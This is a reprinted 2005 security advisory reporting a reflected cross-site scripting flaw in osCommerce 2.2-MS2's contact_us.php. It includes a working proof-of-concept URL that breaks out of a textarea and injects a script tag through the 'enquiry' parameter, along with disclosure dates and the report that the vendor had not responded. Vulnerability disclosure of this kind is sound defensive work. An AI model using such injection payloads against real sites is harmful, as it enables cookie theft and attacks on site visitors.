Risks
Vulnerabilities
Browse by
osCommerce 2.2-MS2 Cross Site Scripting Vulnerability
16 February 2005
Bookmark and Share
From: "John Cobb" <johnc(at)nobytes.com>

Hello All,

I have discovered XSS vulnerability in: osCommerce 2.2-MS2

Authors Site: http://www.oscommerce.com/ [Example:]

XSS:

http://www.victimsite.com/contact_us.php?&name=1&email
=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3
C/script%3E

Result:

A nice pop up box.

[Notes:]

Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet

Regards

John Cobb

JohnC@NoBytes.com

http://www.nobytes.com


Spotlight

The synergy of hackers and tools at the Black Hat Arsenal

Posted on 27 August 2014.  |  Tucked away from the glamour of the vendor booths and the large presentation rooms filled with rockstar sessions, was the Arsenal - a place where developers were able to present their security tools and grow their community.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Wed, Aug 27th
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //